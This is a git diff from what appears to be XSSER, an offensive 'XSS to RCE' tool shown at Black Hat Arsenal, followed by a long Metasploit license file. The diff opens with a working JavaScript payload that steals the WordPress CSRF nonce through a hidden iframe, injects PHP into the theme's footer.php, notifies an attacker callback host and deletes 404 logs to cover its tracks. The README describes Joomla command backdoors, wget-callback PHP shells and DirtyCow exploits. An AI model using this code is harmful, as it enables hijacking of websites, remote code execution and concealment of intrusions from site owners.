(!document.cookie.match(/^(.*;)?\s*Themes_Infected\s*=\s*[^;]+(.*)?$/)) { + + // Read and save the relevant "_wpnonce" - Bypass CSRF protection + // TODO: Consider generating the correct "nonce"-reading code below, which depends on the WordPress version in use. + // var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template')._wpnonce.value; // WP Nonce / CSRF Token + // Newer versions use "nonce" instead of _wpnonce + // noinspection Annotator + var themes_wpnonce = document.getElementById('silent_themes_frame').contentDocument.getElementById('template').nonce.value; // WP Nonce / CSRF Token + var themes_contents = document.getElementById('silent_themes_frame').contentDocument.getElementsByTagName('textarea')[0].value; // Current contents of the file + + // Initiate the form data object + // TODO: Use the pre-existing form in the future if possible. + var formData = new FormData(); + + // Create a variable which holds the current theme data, a new line (Linux format), and then our php payload + var special_content = themes_contents+'\n'+php_input; + + // Prepopulated form with the CSRF ("_wpnonce") token and our PHP payload as specified + formData.append("nonce", themes_wpnonce); // Variable has changed name to "nonce" + formData.append("_wp_http_referer", "%2Fwp-admin%2Ftheme-editor.php%3Ffile%3Dfooter.php"); + formData.append("newcontent", special_content); + formData.append("action", "edit-theme-plugin-file"); + formData.append("file", "footer.php"); + formData.append("theme", "twentyseventeen"); + formData.append("docs-list", ""); + + // Initiate XMLHttpRequest + var request_one = new XMLHttpRequest(); + + // Method and URL to send the request to. + request_one.open("POST", "http://TARGETWEBSITE/wp-admin/admin-ajax.php"); // Set by: xsser.py + // Note: The URL has changed since last version, to "admin-ajax.php" in current WP versions. + // TODO: Maybe implement a version enum function to determine which URL request to use. + // Example contents: http://www.some-wordpress-website.tld/wp-admin/theme-editor.php + + // Send the request with our form data. + request_one.send(formData); + + SetCookie("Themes_Infected", "true"); // Prevent re-infection / loops + // TODO: Maybe change the cookie name and value in the future. + + // Notification feature + var request_two = new XMLHttpRequest(); // Initiate XMLHttpRequest + request_two.open("GET", "http://CALLBACKHOST:CALLBACKPORT/js_shell_notify.txt"); + // Method and URL to send the request to - Hostname and port are set by: xsser.py + request_two.send(); // Send the request + + clean_up(); // Remove initial payload from server + } +} + +// ============================================= FUNCTIONS START ============================================= \\ + +// Injects the main hidden iframe into the page. +// USAGE: main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); +function main_frame_inject(cookiename, identifier, function_name, get_page) { + //if (document.cookie.indexOf(cookiename) == -1) { + var re_cookie = new RegExp('^(.*;)?\\s*'+cookiename+'\\s*=\\s*[^;]+(.*)?$'); + if (!document.cookie.match(re_cookie)) { + + // Append a (hidden) iframe to the HTML body for data injection. + var mainframe = document.createElement("iframe"); + mainframe.setAttribute('id', identifier); + top.document.body.appendChild(mainframe); + mainframe.setAttribute('onload', function_name); + mainframe.setAttribute('style', 'visibility:hidden;display:none'); + mainframe.setAttribute('src', get_page); + } +} + +// Sets a cookie with a very long expiration time +// USAGE: SetCookie("Themes_Infected", "true"); +// TODO: Look into HTML5 Storage instead of cookies maybe. +function SetCookie(cookieName, cookieContent) { + var cookiePath = '/'; + var expDate=new Date(); + expDate.setTime(expDate.getTime()+372800000); + var expires=expDate.toUTCString(); + document.cookie=cookieName+"="+encodeURIComponent(cookieContent)+";path="+encodeURI(cookiePath)+";expires="+expires; +} + +// NOTE: This function should always be executed after the final stage +// Delete all 404 log errors - Including the injected payload(s) +// This function is specific to the Better WP Security XSS vulnerability. +// TODO: Replace the contents of this function with a "place-holder" variable in the next version. +// TODO: This variable, is then replaced, depending on the component being exploited. +// USAGE: clean_up() +function clean_up() { + // noinspection JSUndefinedPropertyAssignment + document.getElementById('404s').checked=true; + document.forms[0].submit(); +} + +// ============================================= FUNCTIONS END ============================================= \\ + +// USAGE: main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); +// function main_frame_inject(cookiename, identifier, function_name, get_page) +main_frame_inject("Themes_Infected", "silent_themes_frame", "silent_themes_inject()", "theme-editor.php?file=footer.php"); diff --git a/README.md b/README.md index 7d6738b..c7ca372 100644 --- a/README.md +++ b/README.md @@ -1,33 +1,49 @@ XSSER ========== -Black Hat Arsenal +Black Hat Arsenal -Black Hat Arsenal +Black Hat Arsenal + +Black Hat Arsenal ### Presentation -* From XSS to RCE 2.5 - Black Hat Europe Arsenal 2016 +* From XSS to RCE 2.75 - Black Hat Europe Arsenal 2017 ### Demo -* Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf -* Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj +* Version 2.0 - 2015: https://www.youtube.com/playlist?list=PLIjb28IYMQgqqqApoGRCZ_O40vP-eKsgf +* Version 2.5 - 2016: https://www.youtube.com/playlist?list=PLRic6PgcrsWGkgacL6WFnSQKVRZIoofRj +* Version 2.75 - 2017: None Currently Available Requirements ------------ -* Python (2.7.*, version 2.7.11 was used for development and demo) -* Gnome -* Bash +* Python (2.7.*, version `2.7.14` was used for development and testing) * Msfconsole (accessible via environment variables) * Netcat (nc) -* cURL (curl) [NEW] -* PyGame (apt-get install python-pygame) [NEW] +* PyGame (pip install pygame) +* jsmin (new dependency - pip install jsmin) +* xterm (previously gnome and bash) + +To install the Python dependencies, you can run the following command: + +`pip install -r requirements.txt` + +If you're using a virtual environment, then you may need to use the full list: + +`pip install -r requirements-all-libraries-used.txt` For installation instructions on Ubuntu 16.04.1 LTS, please refer to the wiki: https://github.com/Varbaek/xsser/wiki +Removed Dependencies: +------------ +* Gnome (switched to xterm) +* Bash (only tested in bash, but should work in other terminals) +* cURL (switched to native python requests) + Payload Compatibility ------------ -* Chrome (14 Nov 2015) - This should still work. -* Firefox (04 Nov 2016) - Tested live at Black Hat Arsenal 2016 +* Chrome (2018) - Tested live at Black Hat Arsenal 2017 and during extras development. +* Firefox - Untested - Should still work as available JS features are almost the same. WordPress Lab ------------------ @@ -52,21 +68,26 @@ Directories ------------ * Audio: Contains remixed audio notifications. * Exploits: Contains DirtyCow (DCOW) privilege escalation exploits. -* Joomla_Backdoor: Contains a sample Joomla extension backdoor which can be uploaded as an administrator and subsequently used to execute arbitrary commands on the system with system($_GET['c']). -* Payloads/javascript: Contains the JavaScript payloads. Contains a new "add new admin" payload for Joomla. -* Shells: Contains the PHP shells to inject, including a slightly modified version of pentestmonkey's shell that connects back via wget. +* Hello_Shell: Contains a Joomla extension backdoor, which can be uploaded as an administrator and + subsequently used to execute arbitrary commands on the system with ?c=ls or ?c64=base64_here. + This directory was originally placed in "Joomla_Backdoor". +* Payloads/javascript: Contains the JavaScript payloads. +* Received_Data: Empty directory which will be used in future versions. +* Shells: Contains the PHP shells, including a slightly modified version of pentestmonkey's shell that + connects back via wget to send the attacker a notification of success. Developed By ------------ * Hans-Michael Varbaek -* Sense of Security +* VarBITS -Credits +Special Credits ------------ * MaXe / InterN0T +* Sense of Security (Versions 2.0 - 2.5) Code Design ----------- * It works! (Again!) -* Spaghetti code -* Just-In-Time for Black Hat Europe 2016 +* Still spaghetti code, but now with almost complete `PEP8` and possible refactoring in the future. +* Just-In-Time for Black Hat Europe 2017 diff --git a/Shells/meterpreter/LICENSE b/Shells/meterpreter/LICENSE index 4dfde19..7daee05 100644 --- a/Shells/meterpreter/LICENSE +++ b/Shells/meterpreter/LICENSE @@ -1,987 +1,987 @@ -https://github.com/rapid7/metasploit-framework/blob/master/LICENSE - -Format: http://www.debian.org/doc/packaging-manuals/copyright-format/1.0/ -Source: http://www.metasploit.com/ - -Files: * -Copyright: 2006-2016, Rapid7, Inc. -License: BSD-3-clause - -# The Metasploit Framework is provided under the 3-clause BSD license provided -# at the end of this file. -# -# The copyright on this package is held by Rapid7, Inc. -# -# This license does not apply to third-party components detailed below. -# -# Last updated: 2013-Nov-04 -# - -Files: data/templates/to_mem_pshreflection.ps1.template -Copyright: 2012, Matthew Graeber -License: BSD-3-clause - -Files: data/john/* -Copyright: 1996-2011 Solar Designer. -License: GPL-2 - -Files: external/pcaprub/* -Copyright: 2007-2008, Alastair Houghton -License: LGPL-2.1 - -Files: external/ruby-kissfft/* -Copyright: 2003-2010 Mark Borgerding - 2009-2012 H D Moore -License: BSD-3-clause - -Files: external/source/exploits/IE11SandboxEscapes/* -Copyright: James Forshaw, 2014 -License: GPLv3 - -Files: external/source/byakugan/* -Copyright: Lurene Grenier, 2009 -License: BSD-3-clause - -Files: external/source/ipwn/* -Copyright: 2004-2005 vlad902 - 2007 H D Moore -License: GPL-2 and Artistic - -Files: external/source/ReflectiveDLLInjection/* -Copyright: 2011, Stephen Fewer of Harmony Security (www.harmonysecurity.com) -License: BSD-3-clause - -Files: external/source/metsvc/* -Copyright: 2007, Determina Inc. -License: BSD-3-clause - -Files: external/source/tightvnc/* -Copyright: 1999 AT&T Laboratories Cambridge. - 2000 Tridia Corp. - 2002-2003 RealVNC Ltd. - 2001-2004 HorizonLive.com, Inc. - 2000-2007 Constantin Kaplinsky - 2000-2009 TightVNC Group -License: GPL-2 - -Files: external/source/unixasm/* -Copyright: 2004-2008 Ramon de Carvalho Valle -License: BSD-4-clause - -Files: external/source/vncdll/winvnc/* -Copyright: 1999 AT&T Laboratories Cambridge. - 2000 Tridia Corp. - 2002-2003 RealVNC Ltd. - 2001-2004 HorizonLive.com, Inc. - 2000-2006 Constantin Kaplinsky. - 2000-2009 TightVNC Group -License: GPL-2 - -Files: lib/anemone.rb lib/anemone/* -Copyright: 2009 Vertive, Inc. -License: MIT - -Files: lib/bit-struct.rb lib/bit-struct/* -Copyright: 2005-2009, Joel VanderWerf -License: Ruby - -Files: lib/metasm.rb lib/metasm/* data/cpuinfo/* -Copyright: 2006-2010 Yoann GUILLOT -License: LGPL-2.1 - -Files: lib/nessus/* -Copyright: Vlatoko Kosturjak -License: BSD-3-clause - -Files: lib/net/dns.rb lib/net/dns/* -Copyright: 2006 Marco Ceresa -License: Ruby - -Files: lib/net/ssh.rb lib/net/ssh/* -Copyright: 2008 Jamis Buck -License: MIT - -Files: lib/packetfu.rb lib/packetfu/* -Copyright: 2008-2012 Tod Beardsley -License: BSD-3-clause - -Files: lib/postgres_msf.rb lib/postgres/postgres-pr/message.rb lib/postgres/postgres-pr/connection.rb -Copyright: 2005 Michael Neumann -License: BSD-3-clause or Ruby - -Files: lib/openvas/* -Copyright: No copyright statement provided -License: MIT - -Files: lib/rabal/* -Copyright: Jeremy Hinegadner -License: Ruby - -Files: lib/rbmysql.rb lib/rbmysql/* -Copyright: 2009 tommy -License: Ruby - -Files: lib/rbreadline.rb -Copyright: 2009 Park Heesob -License: BSD-3-clause - -Files: lib/rkelly/* -Copyright: 2007, 2008, 2009 Aaron Patternson, John Barnette -License: MIT - -Files: lib/snmp.rb lib/snmp/* -Copyright: 2004, David R. Halliday -License: Ruby - -Files: lib/sshkey.rb lib/sshkey/* -Copyright: 2011 James Miller -License: MIT - -Files: lib/windows_console_color_support.rb -Copyright: 2011 Michael 'mihi' Schierl -License: BSD-3-clause - -Files: lib/zip.rb lib/zip/* -Copyright: 2002-2004, Thomas Sandergaard -License: Ruby - -Files: modules/payloads/singles/windows/speak_pwned.rb -Copyright: 2009-2010 Berend-Jan "SkyLined" Wever -License: BSD-3-clause - -Files: data/webcam/api.js -Copyright: Copyright 2013 Muaz Khan<@muazkh>. -License: MIT - - -# -# Gems -# - -Files: activemodel -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: activerecord -Copyright: 2004-2011 David Heinemeier Hansson -License: MIT - -Files: activesupport -Copyright: 2005-2011 David Heinemeier Hansson -License: MIT - -Files: arel -Copyright: 2007-2010 Nick Kallen, Bryan Helmkamp, Emilio Tagua, Aaron Patterson -License: MIT - -Files: bcrypt -Copyright: 2007-2011 Coda Hale -License: MIT - -Files: builder -Copyright: 2003-2012 Jim Weirich (jim.weirich@gmail.com) -License: MIT - -Files: database_cleaner -Copyright: 2009 Ben Mabey -License: MIT - -Files: diff-lcs -Copyright: 2004-2011 Austin Ziegler -License: MIT - -Files: factory_girl -Copyright: 2008-2013 Joe Ferris and thoughtbot, inc. -License: MIT - -Files: fivemat -Copyright: 2012 Tim Pope -License: MIT - -Files: i18n -Copyright: 2008 The Ruby I18n team -License: MIT - -Files: json -Copyright: Daniel Luz -License: Ruby - -Files: metasploit_data_models -Copyright: 2012 Rapid7, Inc. -License: MIT - -Files: mini_portile -Copyright: 2011 Luis Lavena -License: MIT - -Files: msgpack -Copyright: Austin Ziegler -License: Ruby - -Files: multi_json -Copyright: 2010 Michael Bleigh, Josh Kalderimis, Erik Michaels-Ober, and Intridea, Inc. -License: MIT - -Files: network_interface -Copyright: 2012, Rapid7, Inc. -License: MIT - -Files: nokogiri -Copyright: 2008 - 2012 Aaron Patterson, Mike Dalessio, Charles Nutter, Sergio Arbeo, Patrick Mahoney, Yoko Harada -License: MIT - -Files: packetfu -Copyright: 2008-2012 Tod Beardsley -License: BSD-3-clause - -Files: pcaprub -Copyright: 2007-2008, Alastair Houghton -License: LGPL-2.1 - -Files: pg -Copyright: 1997-2012 by the authors -License: Ruby - -Files: rake -Copyright: 2003, 2004 Jim Weirich -License: MIT - -Files: redcarpet -Copyright: 2009 Natacha Porté -License: MIT - -Files: robots -Copyright: 2008 Kyle Maxwell, contributors -License: MIT - -Files: rspec -Copyright: 2009 Chad Humphries, David Chelimsky -License: MIT - -Files: shoulda-matchers -Copyright: 2006-2013, Tammer Saleh, thoughtbot, inc. -License: MIT - -Files: simplecov -Copyright: 2010-2012 Christoph Olszowka -License: MIT - -Files: timecop -Copyright: 2012 Travis Jeffery, John Trupiano -License: MIT - -Files: tzinfo -Copyright: 2005-2006 Philip Ross -License: MIT - -Files: yard -Copyright: 2007-2013 Loren Segal -License: MIT - - -License: BSD-2-clause - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - . - Redistributions of source code must retain the above copyright notice, this - list of conditions and the following disclaimer. - . - Redistributions in binary form must reproduce the above copyright notice, this - list of conditions and the following disclaimer in the documentation and/or - other materials provided with the distribution. - . - THIS SOFTWARE IS PROVIDED BY {{THE COPYRIGHT HOLDERS AND CONTRIBUTORS}} "AS IS" - AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. IN NO EVENT SHALL {{THE COPYRIGHT HOLDER OR CONTRIBUTORS}} BE - LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR - CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE - GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT - OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: BSD-3-clause - Redistribution and use in source and binary forms, with or without modification, - are permitted provided that the following conditions are met: - . - * Redistributions of source code must retain the above copyright notice, - this list of conditions and the following disclaimer. - . - * Redistributions in binary form must reproduce the above copyright notice, - this list of conditions and the following disclaimer in the documentation - and/or other materials provided with the distribution. - . - * Neither the name of Rapid7, Inc. nor the names of its contributors - may be used to endorse or promote products derived from this software - without specific prior written permission. - . - THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND - ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR - ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON - ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: BSD-4-clause - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions are met: - 1. Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - 3. All advertising materials mentioning features or use of this software - must display the following acknowledgement: - This product includes software developed by the . - 4. Neither the name of the nor the - names of its contributors may be used to endorse or promote products - derived from this software without specific prior written permission. - . - THIS SOFTWARE IS PROVIDED BY ''AS IS'' AND ANY - EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED - WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE - DISCLAIMED. IN NO EVENT SHALL BE LIABLE FOR ANY - DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES - (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND - ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT - (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS - SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. - -License: Ruby - 1. You may make and give away verbatim copies of the source form of the - software without restriction, provided that you duplicate all of the - original copyright notices and associated disclaimers. - . - 2. You may modify your copy of the software in any way, provided that - you do at least ONE of the following: - . - a) place your modifications in the Public Domain or otherwise - make them Freely Available, such as by posting said - modifications to Usenet or an equivalent medium, or by allowing - the author to include your modifications in the software. - . - b) use the modified software only within your corporation or - organization. - . - c) rename any non-standard executables so the names do not conflict - with standard executables, which must also be provided. - . - d) make other distribution arrangements with the author. - . - 3. You may distribute the software in object code or executable - form, provided that you do at least ONE of the following: - . - a) distribute the executables and library files of the software, - together with instructions (in the manual page or equivalent) - on where to get the original distribution. - . - b) accompany the distribution with the machine-readable source of - the software. - . - c) give non-standard executables non-standard names, with - instructions on where to get the original software distribution. - . - d) make other distribution arrangements with the author. - . - 4. You may modify and include the part of the software into any other - software (possibly commercial). But some files in the distribution - are not written by the author, so that they are not under this terms. - They are gc.c(partly), utils.c(partly), regex.[ch], fnmatch.[ch], - glob.c, st.[ch] and some files under the ./missing directory. See - each file for the copying condition. - . - 5. The scripts and library files supplied as input to or produced as - output from the software do not automatically fall under the - copyright of the software, but belong to whomever generated them, - and may be sold commercially, and may be aggregated with this - software. - . - 6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR - IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED - WARRANTIES OF MERCHANTIBILITY AND FITNESS FOR A PARTICULAR - PURPOSE. - -License: GPL-2 - This program is free software; you can redistribute it - and/or modify it under the terms of the GNU General Public - License as published by the Free Software Foundation; either - version 2 of the License, or (at your option) any later - version. - . - This program is distributed in the hope that it will be - useful, but WITHOUT ANY WARRANTY; without even the implied - warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR - PURPOSE. See the GNU General Public License for more - details. - . - You should have received a copy of the GNU General Public - License along with this package; if not, write to the Free - Software Foundation, Inc., 51 Franklin St, Fifth Floor, - Boston, MA 02110-1301 USA - . - On Debian systems, the full text of the GNU General Public - License version 2 can be found in the file - `/usr/share/common-licenses/GPL-2'. - -License: LGPL-2.1 - This library is free software; you can redistribute it and/or - modify it under the terms of the GNU Lesser General Public - License as published by the Free Software Foundation; either - version 2.1 of the License, or (at your option) any later version. - . - This library is distributed in the hope that it will be useful, - but WITHOUT ANY WARRANTY; without even the implied warranty of - MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU - Lesser General Public License for more details. - . - You should have received a copy of the GNU Lesser General Public - License along with this library; if not, write to the Free Software - Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA - -License: OpenSSL - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions - are met: - . - 1. Redistributions of source code must retain the above copyright - notice, this list of conditions and the following disclaimer. - . - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in - the documentation and/or other materials provided with the - distribution. - . - 3. All advertising materials mentioning features or use of this - software must display the following acknowledgment: - "This product includes software developed by the OpenSSL Project - for use in the OpenSSL Toolkit. (http://www.openssl.org/)" - . - 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to - endorse or promote products derived from this software without - prior written permission. For written permission, please contact - openssl-core@openssl.org. - . - 5. Products derived from this software may not be called "OpenSSL" - nor may "OpenSSL" appear in their names without prior written - permission of the OpenSSL Project. - . - 6. Redistributions of any form whatsoever must retain the following - acknowledgment: - "This product includes software developed by the OpenSSL Project - for use in the OpenSSL Toolkit (http://www.openssl.org/)" - . - THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT `AS IS'' AND ANY - EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR - PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR - ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, - SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT - NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; - LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, - STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) - ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED - OF THE POSSIBILITY OF SUCH DAMAGE. - . - This product includes cryptographic software written by Eric Young - (eay@cryptsoft.com). This product includes software written by Tim - Hudson (tjh@cryptsoft.com). - -License: SSLeay - This package is an SSL implementation written - by Eric Young (eay@cryptsoft.com). - The implementation was written so as to conform with Netscapes SSL. - . - This library is free for commercial and non-commercial use as long as - the following conditions are aheared to. The following conditions - apply to all code found in this distribution, be it the RC4, RSA, - lhash, DES, etc., code; not just the SSL code. The SSL documentation - included with this distribution is covered by the same copyright terms - except that the holder is Tim Hudson (tjh@cryptsoft.com). - . - Copyright remains Eric Young's, and as such any Copyright notices in - the code are not to be removed. - If this package is used in a product, Eric Young should be given attribution - as the author of the parts of the library used. - This can be in the form of a textual message at program startup or - in documentation (online or textual) provided with the package. - . - Redistribution and use in source and binary forms, with or without - modification, are permitted provided that the following conditions - are met: - 1. Redistributions of source code must retain the copyright - notice, this list of conditions and the following disclaimer. - 2. Redistributions in binary form must reproduce the above copyright - notice, this list of conditions and the following disclaimer in the - documentation and/or other materials provided with the distribution. - 3. All advertising materials mentioning features or use of this software - must display the following acknowledgement: - "This product includes cryptographic software written by - Eric Young (eay@cryptsoft.com)" - The word 'cryptographic' can be left out if the rouines from the library - being used are not cryptographic related :-). - 4. If you include any Windows specific code (or a derivative thereof) from - the apps directory (application code) you must include an acknowledgement: - "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" - . - THIS SOFTWARE IS PROVIDED BY ERIC YOUNG `AS IS'' AND - ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE - IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE - ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE - FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL - DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS - OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) - HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT - LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY - OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF - SUCH DAMAGE. - . - The licence and distribution terms for any publically available version or - derivative of this code cannot be changed. i.e. this code cannot simply be - copied and put under another distribution licence - [including the GNU Public Licence.] - -License: MIT - Permission is hereby granted, free of charge, to any person obtaining - a copy of this software and associated documentation files (the - "Software"), to deal in the Software without restriction, including - without limitation the rights to use, copy, modify, merge, publish, - distribute, sublicense, and/or sell copies of the Software, and to - permit persons to whom the Software is furnished to do so, subject to - the following conditions: - . - The above copyright notice and this permission notice shall be - included in all copies or substantial portions of the Software. - . - THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, - EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF - MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND - NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE - LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION - OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION - WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. - -License: Artistic - Copyright (c) 2000-2006, The Perl Foundation. - . - Everyone is permitted to copy and distribute verbatim copies - of this license document, but changing it is not allowed. - . - Preamble - . - This license establishes the terms under which a given free software - Package may be copied, modified, distributed, and/or redistributed. - The intent is that the Copyright Holder maintains some artistic - control over the development of that Package while still keeping the - Package available as open source and free software. - . - You are always permitted to make arrangements wholly outside of this - license directly with the Copyright Holder of a given Package. If the - terms of this license do not permit the full use that you propose to - make of the Package, you should contact the Copyright Holder and seek - a different licensing arrangement. - . - Definitions - . - "Copyright Holder" means the individual(s) or organization(s) - named in the copyright notice for the entire Package. - . - "Contributor" means any party that has contributed code or other - material to the Package, in accordance with the Copyright Holder's - procedures. - . - "You" and "your" means any person who would like to copy, - distribute, or modify the Package. - . - "Package" means the collection of files distributed by the - Copyright Holder, and derivatives of that collection and/or of - those files. A given Package may consist of either the Standard - Version, or a Modified Version. - . - "Distribute" means providing a copy of the Package or making it - accessible to anyone else, or in the case of a company or - organization, to others outside of your company or organization. - . - "Distributor Fee" means any fee that you charge for Distributing - this Package or providing support for this Package to another - party. It does not mean licensing fees. - . - "Standard Version" refers to the Package if it has not been - modified, or has been modified only in ways explicitly requested - by the Copyright Holder. - . - "Modified Version" means the Package, if it has been changed, and - such changes were not explicitly requested by the Copyright - Holder. - . - "Original License" means this Artistic License as Distributed with - the Standard Version of the Package, in its current version or as - it may be modified by The Perl Foundation in the future. - . - "Source" form means the source code, documentation source, and - configuration files for the Package. - . - "Compiled" form means the compiled bytecode, object code, binary, - or any other form resulting from mechanical transformation or - translation of the Source form. - . - Permission for Use and Modification Without Distribution - . - (1) You are permitted to use the Standard Version and create and use - Modified Versions for any purpose without restriction, provided that - you do not Distribute the Modified Version. - . - . - Permissions for Redistribution of the Standard Version - . - (2) You may Distribute verbatim copies of the Source form of the - Standard Version of this Package in any medium without restriction, - either gratis or for a Distributor Fee, provided that you duplicate - all of the original copyright notices and associated disclaimers. At - your discretion, such verbatim copies may or may not include a - Compiled form of the Package. - . - (3) You may apply any bug fixes, portability changes, and other - modifications made available from the Copyright Holder. The resulting - Package will still be considered the Standard Version, and as such - will be subject to the Original License. - . - . - Distribution of Modified Versions of the Package as Source - . - (4) You may Distribute your Modified Version as Source (either gratis - or for a Distributor Fee, and with or without a Compiled form of the - Modified Version) provided that you clearly document how it differs - from the Standard Version, including, but not limited to, documenting - any non-standard features, executables, or modules, and provided that - you do at least ONE of the following: - . - (a) make the Modified Version available to the Copyright Holder - of the Standard Version, under the Original License, so that the - Copyright Holder may include your modifications in the Standard - Version. - . - (b) ensure that installation of your Modified Version does not - prevent the user installing or running the Standard Version. In - addition, the Modified Version must bear a name that is different - from the name of the Standard Version. - . - (c) allow anyone who receives a copy of the Modified Version to - make the Source form of the Modified Version available to others - under - . - (i) the Original License or - . - (ii) a license that permits the licensee to freely copy, - modify and redistribute the Modified Version using the same - licensing terms that apply to the copy that the licensee - received, and requires that the Source form of the Modified - Version, and of any works derived from it, be made freely - available in that license fees are prohibited but Distributor - Fees are allowed. - . - . - Distribution of Compiled Forms of the Standard Version - or Modified Versions without the Source - . - (5) You may Distribute Compiled forms of the Standard Version without - the Source, provided that you include complete instructions on how to - get the Source of the Standard Version. Such instructions must be - valid at the time of your distribution. If these instructions, at any - time while you are carrying out such distribution, become invalid, you - must provide new instructions on demand or cease further distribution. - If you provide valid instructions or cease distribution within thirty - days after you become aware that the instructions are invalid, then - you do not forfeit any of your rights under this license. - . - (6) You may Distribute a Modified Version in Compiled form without - the Source, provided that you comply with Section 4 with respect to - the Source of the Modified Version. - . - . - Aggregating or Linking the Package - . - (7) You may 